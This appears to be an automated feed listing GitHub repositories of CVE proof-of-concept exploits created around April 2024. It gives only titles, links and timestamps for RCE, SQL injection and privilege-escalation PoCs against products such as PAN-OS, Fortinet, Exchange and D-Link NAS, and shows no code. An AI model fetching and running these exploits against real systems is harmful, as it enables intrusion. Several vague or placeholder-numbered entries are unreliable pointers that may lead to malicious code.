**CVE-2024-21413 Setup for CW** : [KartheekKandalam99/CVE-2024-21413](https://github.com/KartheekKandalam99/CVE-2024-21413) create time: 2024-04-13T08:54:00Z

**Wondershare MobileTrans 4.5.6 - Unquoted Service Path** : [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462) create time: 2024-04-13T06:27:28Z

**Exploit CVE-2024-32003 for the wn-dusk-plugin in Winter CMS** : [JohnNetSouldRU/CVE-2024-32003-POC](https://github.com/JohnNetSouldRU/CVE-2024-32003-POC) create time: 2024-04-13T05:48:40Z

**Exploit CVE-2024-31233 for the Sizam Rehub WordPress Theme (UPDATE)** : [JohnNetSouldRU/CVE-2024-31233-Exploit-POC](https://github.com/JohnNetSouldRU/CVE-2024-31233-Exploit-POC) create time: 2024-04-13T05:30:00Z

**no description** : [Yuvvi01/CVE-2024-3400-main](https://github.com/Yuvvi01/CVE-2024-3400-main) create time: 2024-04-13T05:16:21Z

**no description** : [zzcentury/FortiGate-CVE-2024-21762](https://github.com/zzcentury/FortiGate-CVE-2024-21762) create time: 2024-04-13T02:17:23Z

**CVE-2023-43481** : [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser) create time: 2023-09-13T02:03:34Z

**This is a simple demo for the BadBatBut vulnerability CVE-2024-24576** : [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo) create time: 2024-04-12T23:36:05Z

**no description** : [randshell/CVE-2024-29384](https://github.com/randshell/CVE-2024-29384) create time: 2024-01-21T13:33:53Z

**CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software** : [bigsclowns/CVE-2024-3400-POC](https://github.com/bigsclowns/CVE-2024-3400-POC) create time: 2024-04-12T17:41:52Z

**This script is designed to demonstrate the exploitation of vulnerabilities in PAN-OS firewalls. It sends a specially crafted payload to the firewall's API endpoint to execute arbitrary commands.** : [DrewskyDev/CVE-2024-3400](https://github.com/DrewskyDev/CVE-2024-3400) create time: 2024-04-12T17:39:59Z

**CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software** : [hubabuba228/CVE-2024-3400-POC](https://github.com/hubabuba228/CVE-2024-3400-POC) create time: 2024-04-12T17:14:38Z

**NEW POC CVE-2024-2879 Exploit ----> RCE** : [JohnNetSouldRU/CVE-2024-2879-POC](https://github.com/JohnNetSouldRU/CVE-2024-2879-POC) create time: 2024-04-12T12:14:20Z

**no description** : [drdry2/CVE-2024-3136-Wordpress-RCE](https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE) create time: 2024-04-12T10:19:40Z

**no description** : [mrobsidian1/CVE-2024-29988-MS-Exchange-RCE](https://github.com/mrobsidian1/CVE-2024-29988-MS-Exchange-RCE) create time: 2024-04-12T10:17:58Z

**no description** : [Geniorio01/CVE-2024-21508-mysql2-RCE](https://github.com/Geniorio01/CVE-2024-21508-mysql2-RCE) create time: 2024-04-12T09:54:56Z

**no description** : [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc) create time: 2024-04-12T03:59:03Z

**no description** : [Geniorio01/CVE-2024-21426-SharePoint-RCE](https://github.com/Geniorio01/CVE-2024-21426-SharePoint-RCE) create time: 2024-04-12T08:58:09Z

**no description** : [MrSecby/CVE-2024-25693-exploit](https://github.com/MrSecby/CVE-2024-25693-exploit) create time: 2024-04-12T08:50:43Z

**no description** : [AlexLondan/CVE-2024-21894-Proof-of-concept](https://github.com/AlexLondan/CVE-2024-21894-Proof-of-concept) create time: 2024-04-12T08:50:40Z

**PoC for CVE-2023-45288, continuation flood vulnerability** : [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc) create time: 2024-04-12T07:36:39Z

**Telesquare TLR-2005KSH_RCE (CVE-2024-29269) Batch scan/exploit** : [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269) create time: 2024-04-12T07:36:08Z

**OpenMetadata_RCE (CVE-2024-28255) Batch scan/exploit** : [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255) create time: 2024-04-12T04:29:58Z

**CVE-2023-6319 proof of concept** : [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv) create time: 2024-04-11T18:58:17Z

**no description** : [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752) create time: 2024-04-11T13:39:44Z

**no description** : [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389) create time: 2024-04-11T14:03:23Z

**Public exploit for CVE-2024-31777** : [FreySolarEye/CVE-2024-31777](https://github.com/FreySolarEye/CVE-2024-31777) create time: 2024-04-11T13:48:19Z

**no description** : [Cheomolina/cvent2024test](https://github.com/Cheomolina/cvent2024test) create time: 2024-04-11T12:53:29Z

**CVE-2024-24576 PoC for Nim Lang** : [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim) create time: 2024-04-11T10:22:10Z

**Sudo 1.9 exploit** : [FoxyProxys/CVE-2024-3000](https://github.com/FoxyProxys/CVE-2024-3000) create time: 2024-04-10T23:34:10Z

**Exploit code for CVE-2018-4407** : [szabo-tibor/CVE-2018-4407](https://github.com/szabo-tibor/CVE-2018-4407) create time: 2024-04-10T20:20:13Z

**CVE-2024-24576 Proof of Concept** : [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit) create time: 2024-04-10T14:06:09Z

**no description** : [drdry2/CVE-2024-3094-EXPLOIT](https://github.com/drdry2/CVE-2024-3094-EXPLOIT) create time: 2024-04-10T13:46:00Z

**This script serves as a proof of concept (PoC) for the CVE-2024-XXXX vulnerability in AnyDesk version 7.0.15. The vulnerability involves an unquoted service path, allowing an authorized but non-privileged local user to potentially execute arbitrary code with elevated privileges on the system.** : [blackmagic2023/AnyDesk-7.0.15---Unquoted-Service-Path-PoC](https://github.com/blackmagic2023/AnyDesk-7.0.15---Unquoted-Service-Path-PoC) create time: 2024-04-10T12:58:12Z

**no description** : [brains93/CVE-2024-24567-PoC-Python](https://github.com/brains93/CVE-2024-24567-PoC-Python) create time: 2024-04-10T10:27:55Z

**Ray OS Command Injection RCE(Unauthorized)** : [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019) create time: 2024-04-10T09:24:06Z

**Ray OS Command Injection RCE(Unauthorized)** : [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019) create time: 2024-04-10T09:16:37Z

**no description** : [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626) create time: 2024-04-10T09:12:06Z

**Unauthenticated Form Submission Unique ID Modification** : [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710) create time: 2024-04-10T07:23:11Z

**D-Link NAS Command Execution Exploit** : [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273) create time: 2024-04-10T00:27:02Z

**The script is from https://github.com/JohnHammond/msdt-follina, just make it simple for me to use it and this script aim at generating the payload for more information refer the johnn hammond link** : [alien-keric/CVE-2022-30190](https://github.com/alien-keric/CVE-2022-30190) create time: 2024-04-09T22:40:09Z

**no description** : [churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection) create time: 2024-04-09T22:05:29Z

**Example of CVE-2024-24576 use case.** : [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC) create time: 2024-04-09T21:17:15Z

**CVE-2024-29296 - User enumeration on Portainer CE - 2.19.4** : [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296) create time: 2024-04-09T20:36:03Z

**Unauthenticated Remote Code Execution (RCE) Vulnerability in WWBNIndex Plugin of AVideo Platform from 12.4 to 14.2** : [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819) create time: 2024-03-27T14:41:10Z

**CVE-2024-30255 This repository contains a proof-of-concept (PoC) Python script to demonstrate the CPU exhaustion vulnerability in Envoy caused by a flood of CONTINUATION frames.** : [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC) create time: 2024-04-09T15:59:50Z

**This document provides a step-by-step guide to configuring a vulnerable Apache HTTP Server environment on Ubuntu 20.04 for educational purposes, specifically to demonstrate CVE-2021-41773. The setup detailed below is intended solely for use in controlled, secure, and isolated test environments.** : [sanskaros/CVE-2021-41773-Exploit-Environment](https://github.com/sanskaros/CVE-2021-41773-Exploit-Environment) create time: 2024-04-09T12:33:34Z

**Small CRM** : [psudo-bugboy/CVE-2024](https://github.com/psudo-bugboy/CVE-2024) create time: 2024-04-06T20:21:22Z

**no description** : [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT) create time: 2024-04-09T12:26:37Z

**PoC for CVE-2022-21340** : [Alexandre-Bartel/CVE-2022-21340](https://github.com/Alexandre-Bartel/CVE-2022-21340) create time: 2024-04-09T10:41:12Z

**no description** : [mrobsidian1/CVE-2023-48788-Proof-of-concept-SQLinj](https://github.com/mrobsidian1/CVE-2023-48788-Proof-of-concept-SQLinj) create time: 2024-04-09T10:54:31Z

**no description** : [MrSecby/CVE-2024-26198-Exchange-RCE](https://github.com/MrSecby/CVE-2024-26198-Exchange-RCE) create time: 2024-04-09T10:54:28Z

**no description** : [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127) create time: 2024-04-09T09:35:25Z

**no description** : [RenukaSelvar/kernel_rt_CVE_2023_1077](https://github.com/RenukaSelvar/kernel_rt_CVE_2023_1077) create time: 2024-04-09T08:27:58Z

**no description** : [saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205](https://github.com/saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205) create time: 2024-04-09T07:20:33Z

**Proof of concept (PoC) for CVE-2024-27316 (tested), CVE-2024-30255 (untested), CVE-2024-31309 (untested), CVE-2024-28182 (untested), CVE-2024-2653 (untested) and CVE-2024-27919 (untested)** : [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316) create time: 2024-04-09T08:08:07Z

**no description** : [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127) create time: 2024-04-09T05:35:00Z

**Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) no user interaction is required to exploit this vulnerability.** : [xxDlib/CVE-2024-20720-PoC](https://github.com/xxDlib/CVE-2024-20720-PoC) create time: 2024-04-09T05:11:27Z

**no description** : [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127) create time: 2024-04-09T03:01:32Z

**CVE-2024-29399 reference** : [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399) create time: 2024-04-08T23:03:04Z

**CVE-2020-12641: Command Injection via “_im_convert_path” Parameter in Roundcube Webmail** : [mbadanoiu/CVE-2020-12641](https://github.com/mbadanoiu/CVE-2020-12641) create time: 2024-04-08T19:48:16Z

**CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection** : [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879) create time: 2024-04-08T18:50:02Z

**This repository is for Firebolt wristphone vulnerability for CVE ID CVE-2024-30656 suggested by MITRE** : [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability) create time: 2024-04-08T17:05:39Z

**Exploit CVE-2024-21894 for Vulnerable Ivanti Connect Secure and Policy Secure Gateways POC** : [RansomGroupCVE/CVE-2024-21894-POC](https://github.com/RansomGroupCVE/CVE-2024-21894-POC) create time: 2024-04-08T16:50:32Z

**UNTESTED exploit script for CVE-2024-3272 + CVE-2024-3273. The script exploits a backdoor authentication bypass + arbitrary command injection vulnerability.** : [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE) create time: 2024-04-08T13:54:07Z

**no description** : [AlexLondan/CVE-2024-21762-Fortinet-RCE-ALLWORK](https://github.com/AlexLondan/CVE-2024-21762-Fortinet-RCE-ALLWORK) create time: 2024-04-08T13:30:55Z

**no description** : [JohnnyBradvo/CVE-2024-21426-SharePoint-RCE](https://github.com/JohnnyBradvo/CVE-2024-21426-SharePoint-RCE) create time: 2024-04-08T13:30:53Z

**no description** : [nidhi7598/frameworks_base_AOSP10_r33_CVE-2023-45777](https://github.com/nidhi7598/frameworks_base_AOSP10_r33_CVE-2023-45777) create time: 2022-07-04T11:44:39Z

**no description** : [AlexLondan/CVE-2024-3333](https://github.com/AlexLondan/CVE-2024-3333) create time: 2024-04-08T13:13:53Z

**no description** : [JohnnyBradvo/CVE-2024-6666](https://github.com/JohnnyBradvo/CVE-2024-6666) create time: 2024-04-08T12:52:46Z

**no description** : [JohnnyBradvo/CVE-2024-5555](https://github.com/JohnnyBradvo/CVE-2024-5555) create time: 2024-04-08T12:50:59Z

**no description** : [JohnnyBradvo/CVE-2024-2222](https://github.com/JohnnyBradvo/CVE-2024-2222) create time: 2024-04-08T12:45:38Z

**no description** : [JohnnyBradvo/CVE-2024-4444](https://github.com/JohnnyBradvo/CVE-2024-4444) create time: 2024-04-08T12:35:02Z

**no description** : [JohnnyBradvo/CVE-2024-3333](https://github.com/JohnnyBradvo/CVE-2024-3333) create time: 2024-04-08T12:34:59Z

**Privilege Escalation in Microsoft Exchange 2019** : [JohnBordon/CVE-2024-21410-poc](https://github.com/JohnBordon/CVE-2024-21410-poc) create time: 2024-04-08T10:54:08Z

**Exploit CVE-2024-31233 for the Sizam Rehub WordPress Theme** : [JohnNetSouldRU/CVE-2024-31233](https://github.com/JohnNetSouldRU/CVE-2024-31233) create time: 2024-04-08T10:19:21Z

**CVE-2024-31286: WordPress WP Photo Album Plus plugin < 8.6.03.005 - Arbitrary File Upload vulnerability** : [Auggustino/CVE-2024-31286-Wordpress-Exploit](https://github.com/Auggustino/CVE-2024-31286-Wordpress-Exploit) create time: 2024-04-08T10:12:03Z

**rust-rustlings-2024-spring-ChenCveral created by GitHub Classroom** : [LearningOS/rust-rustlings-2024-spring-ChenCveral](https://github.com/LearningOS/rust-rustlings-2024-spring-ChenCveral) create time: 2024-04-08T08:09:17Z

**no description** : [Chokopikkk/CVE-2024-31218_exploit](https://github.com/Chokopikkk/CVE-2024-31218_exploit) create time: 2024-04-08T08:01:15Z

**no description** : [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306) create time: 2024-04-08T01:15:21Z

**CVE-2023-44792 Reference** : [ally-petitt/CVE-2023-44792](https://github.com/ally-petitt/CVE-2023-44792) create time: 2024-04-07T23:43:39Z

**Making a lab and testing the CVE-2024-3116, a Remote Code Execution in pgadmin <=8.4** : [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4) create time: 2024-04-07T23:03:55Z

**Quick and dirty honeypot for CVE-2024-3273** : [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273) create time: 2024-04-07T21:15:33Z

**PoC - CVE-2023-36407** : [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407) create time: 2024-04-07T16:59:55Z

**CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2021-42013) in Apache 2.4.50.** : [BassoNicolas/CVE-2021-42013](https://github.com/BassoNicolas/CVE-2021-42013) create time: 2024-04-07T16:04:06Z

**Exploit for CVE-2024-3273, supports single and multiple hosts** : [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273) create time: 2024-04-07T15:36:18Z

**About POC CVE-2024-22328 Exploit** : [RansomGroupCVE/CVE-2024-22328-POC](https://github.com/RansomGroupCVE/CVE-2024-22328-POC) create time: 2024-04-07T13:09:17Z

**no description** : [FoxyProxys/CVE-2024-3116](https://github.com/FoxyProxys/CVE-2024-3116) create time: 2024-04-07T12:59:48Z

**CVE-2023-21768 Proof of Concept** : [Ha0-Y/CVE-2023-21768](https://github.com/Ha0-Y/CVE-2023-21768) create time: 2024-04-07T02:26:36Z

**D-Link NAS CVE-2024-3273 Exploit Tool** : [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273) create time: 2024-04-07T03:09:13Z

**CVE-2024–27630 Reference** : [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630) create time: 2024-04-07T00:13:13Z

**CVE-2024–27632 Reference** : [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632) create time: 2024-04-06T23:42:30Z

**CVE-2024–27631 Reference** : [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631) create time: 2024-04-06T23:30:01Z

**CVE-2024-25733 | ARC Browser Address Bar Spoofing PoC - iOS/iPadOS** : [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC) create time: 2024-04-06T20:18:15Z

**no description** : [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831) create time: 2024-04-06T16:55:29Z

**Publicly disclosed Proof-of-Concept (POC) exploit for the [email protected] version** : [lirantal/safer-eval-cve-CVE-2019-10760](https://github.com/lirantal/safer-eval-cve-CVE-2019-10760) create time: 2024-04-06T14:13:43Z

**no description** : [n-etupirka/CVE-2023-50164](https://github.com/n-etupirka/CVE-2023-50164) create time: 2024-04-04T02:56:17Z

**no description** : [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614) create time: 2024-04-06T08:26:04Z

**no description** : [0xCuteSocks/cve-2023-45288](https://github.com/0xCuteSocks/cve-2023-45288) create time: 2024-04-06T06:33:45Z

**Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)** : [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan) create time: 2024-04-06T06:29:43Z

**POC for new Ivanti RCE explosed 16000 VPN Gateways** : [Ronoffer/CVE-2024-21894-Proof-of-concept](https://github.com/Ronoffer/CVE-2024-21894-Proof-of-concept) create time: 2024-04-06T06:17:32Z

**Files for CVE report** : [bucketcat/CVE-2024--](https://github.com/bucketcat/CVE-2024--) create time: 2024-04-06T02:48:59Z

**CHAOS RAT web panel path RCE PoC** : [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc) create time: 2024-04-05T21:35:04Z

**Roundcube before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4 and allows XSS to be saved via an HTML email message with a crafted SVG document due to program/ behavior lib/Roundcube/rcube_washtml.php** : [soreta2/CVE-2023-5631-POC](https://github.com/soreta2/CVE-2023-5631-POC) create time: 2024-04-05T20:47:32Z

**no description** : [FoxyProxys/CVE-2024-0582](https://github.com/FoxyProxys/CVE-2024-0582) create time: 2024-04-05T18:12:22Z

**CVE-2023-6634** : [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634) create time: 2024-04-05T18:07:08Z

**CVE-2024-29201 JumpServer Ansible Remote Code Execution POC** : [chokopikk/CVE-2024-29201-POC](https://github.com/chokopikk/CVE-2024-29201-POC) create time: 2024-04-05T17:00:20Z

**no description** : [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582) create time: 2024-04-05T15:39:48Z

**Exploit to PATH Traversal Esri Portal for ArcGIS versions <= 11.2** : [MrCyb3rSec/CVE-2024-25693-exploit](https://github.com/MrCyb3rSec/CVE-2024-25693-exploit) create time: 2024-04-05T14:32:51Z

**Remote Command Execution Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30737](https://github.com/yashpatelphd/CVE-2024-30737) create time: 2024-04-05T11:41:48Z

**Insecure Deserialization Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30736](https://github.com/yashpatelphd/CVE-2024-30736) create time: 2024-04-05T11:37:53Z

**Arbitrary File Upload Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30735](https://github.com/yashpatelphd/CVE-2024-30735) create time: 2024-04-05T11:35:13Z

**Buffer Overflow Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30733](https://github.com/yashpatelphd/CVE-2024-30733) create time: 2024-04-05T11:30:30Z

**Insecure Logging Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30730](https://github.com/yashpatelphd/CVE-2024-30730) create time: 2024-04-05T11:23:45Z

**OS Command Injection Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30729](https://github.com/yashpatelphd/CVE-2024-30729) create time: 2024-04-05T11:20:26Z

**Security Misconfiguration in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30728](https://github.com/yashpatelphd/CVE-2024-30728) create time: 2024-04-05T11:18:00Z

**Information Leakage in ROS Kinetic Kame via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-30727](https://github.com/yashpatelphd/CVE-2024-30727) create time: 2024-04-05T11:14:44Z

**Shell Injection Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30726](https://github.com/yashpatelphd/CVE-2024-30726) create time: 2024-04-05T11:11:38Z

**Unauthorized Information Access Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30724](https://github.com/yashpatelphd/CVE-2024-30724) create time: 2024-04-05T11:06:04Z

**Unauthorized Node Injection Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30723](https://github.com/yashpatelphd/CVE-2024-30723) create time: 2024-04-05T11:02:29Z

**Denial-of-Service (DoS) Vulnerability in ROS Kinetic Kame** : [yashpatelphd/CVE-2024-30722](https://github.com/yashpatelphd/CVE-2024-30722) create time: 2024-04-05T10:59:20Z

**Arbitrary File Upload Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30721](https://github.com/yashpatelphd/CVE-2024-30721) create time: 2024-04-05T09:18:56Z

**Insecure Deserialization Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30719](https://github.com/yashpatelphd/CVE-2024-30719) create time: 2024-04-05T09:13:48Z

**Remote Command Execution Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30718](https://github.com/yashpatelphd/CVE-2024-30718) create time: 2024-04-05T09:10:33Z

**Insecure Logging Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30716](https://github.com/yashpatelphd/CVE-2024-30716) create time: 2024-04-05T09:03:00Z

**Buffer Overflow Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30715](https://github.com/yashpatelphd/CVE-2024-30715) create time: 2024-04-05T09:00:47Z

**OS Command Injection Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30713](https://github.com/yashpatelphd/CVE-2024-30713) create time: 2024-04-05T08:55:12Z

**Shell Injection Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30712](https://github.com/yashpatelphd/CVE-2024-30712) create time: 2024-04-05T08:51:04Z

**Security Misconfiguration in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30711](https://github.com/yashpatelphd/CVE-2024-30711) create time: 2024-04-05T08:47:00Z

**Information Leakage in ROS2 Dashing Diademata via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-30710](https://github.com/yashpatelphd/CVE-2024-30710) create time: 2024-04-05T08:44:11Z

**Denial-of-Service (DoS) Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30708](https://github.com/yashpatelphd/CVE-2024-30708) create time: 2024-04-05T08:35:00Z

**Unauthorized Node Injection Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30707](https://github.com/yashpatelphd/CVE-2024-30707) create time: 2024-04-05T08:31:34Z

**Unauthorized Access Vulnerability in ROS2 Dashing Diademata** : [yashpatelphd/CVE-2024-30706](https://github.com/yashpatelphd/CVE-2024-30706) create time: 2024-04-05T08:28:29Z

**Insecure Deserialization Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30704](https://github.com/yashpatelphd/CVE-2024-30704) create time: 2024-04-05T07:53:14Z

**Arbitrary File Upload Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30703](https://github.com/yashpatelphd/CVE-2024-30703) create time: 2024-04-05T07:50:36Z

**Remote Command Execution Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30702](https://github.com/yashpatelphd/CVE-2024-30702) create time: 2024-04-05T07:47:50Z

**Insecure Logging Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30701](https://github.com/yashpatelphd/CVE-2024-30701) create time: 2024-04-05T07:44:57Z

**Buffer Overflow Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30699](https://github.com/yashpatelphd/CVE-2024-30699) create time: 2024-04-05T07:40:30Z

**Information Leakage in ROS2 Galactic Geochelone via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-30697](https://github.com/yashpatelphd/CVE-2024-30697) create time: 2024-04-05T07:34:53Z

**OS Command Injection Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30696](https://github.com/yashpatelphd/CVE-2024-30696) create time: 2024-04-05T07:32:26Z

**Security Misconfiguration in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30695](https://github.com/yashpatelphd/CVE-2024-30695) create time: 2024-04-05T07:29:59Z

**Shell Injection Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30694](https://github.com/yashpatelphd/CVE-2024-30694) create time: 2024-04-05T07:26:05Z

**Denial-of-Service (DoS) Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30692](https://github.com/yashpatelphd/CVE-2024-30692) create time: 2024-04-05T07:21:20Z

**Unauthorized Access Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30691](https://github.com/yashpatelphd/CVE-2024-30691) create time: 2024-04-05T07:18:11Z

**DirtyCOW 笔记** : [ASUKA39/CVE-2016-5195](https://github.com/ASUKA39/CVE-2016-5195) create time: 2024-04-05T07:14:07Z

**Unauthorized Node Injection Vulnerability in ROS2 Galactic Geochelone** : [yashpatelphd/CVE-2024-30690](https://github.com/yashpatelphd/CVE-2024-30690) create time: 2024-04-05T07:13:52Z

**Arbitrary File Upload Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30688](https://github.com/yashpatelphd/CVE-2024-30688) create time: 2024-04-05T07:07:24Z

**Insecure Deserialization Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30687](https://github.com/yashpatelphd/CVE-2024-30687) create time: 2024-04-05T07:04:36Z

**Remote Command Execution Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30686](https://github.com/yashpatelphd/CVE-2024-30686) create time: 2024-04-05T07:00:40Z

**Insecure Logging Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30684](https://github.com/yashpatelphd/CVE-2024-30684) create time: 2024-04-05T06:48:46Z

**Buffer Overflow Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30683](https://github.com/yashpatelphd/CVE-2024-30683) create time: 2024-04-05T06:45:50Z

**OS Command Injection Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30681](https://github.com/yashpatelphd/CVE-2024-30681) create time: 2024-04-05T06:39:18Z

**Shell Injection Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30680](https://github.com/yashpatelphd/CVE-2024-30680) create time: 2024-04-05T06:36:11Z

**Security Misconfiguration in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30679](https://github.com/yashpatelphd/CVE-2024-30679) create time: 2024-04-05T06:33:28Z

**Information Leakage in ROS2 Iron Irwini via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-30678](https://github.com/yashpatelphd/CVE-2024-30678) create time: 2024-04-05T06:29:53Z

**Denial-of-Service (DoS) Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30676](https://github.com/yashpatelphd/CVE-2024-30676) create time: 2024-04-05T06:24:24Z

**no description** : [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386) create time: 2024-04-05T05:47:00Z

**no description** : [yashpatelphd/CVE-2024-30675](https://github.com/yashpatelphd/CVE-2024-30675) create time: 2024-04-05T06:21:37Z

**Unauthorized Information Access Vulnerability in ROS2 Iron Irwini** : [yashpatelphd/CVE-2024-30674](https://github.com/yashpatelphd/CVE-2024-30674) create time: 2024-04-05T06:17:48Z

**Arbitrary File Upload Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30672](https://github.com/yashpatelphd/CVE-2024-30672) create time: 2024-04-05T06:07:36Z

**Insecure Deserialization Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30667](https://github.com/yashpatelphd/CVE-2024-30667) create time: 2024-04-05T05:53:01Z

**Buffer Overflow Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30666](https://github.com/yashpatelphd/CVE-2024-30666) create time: 2024-04-05T05:49:12Z

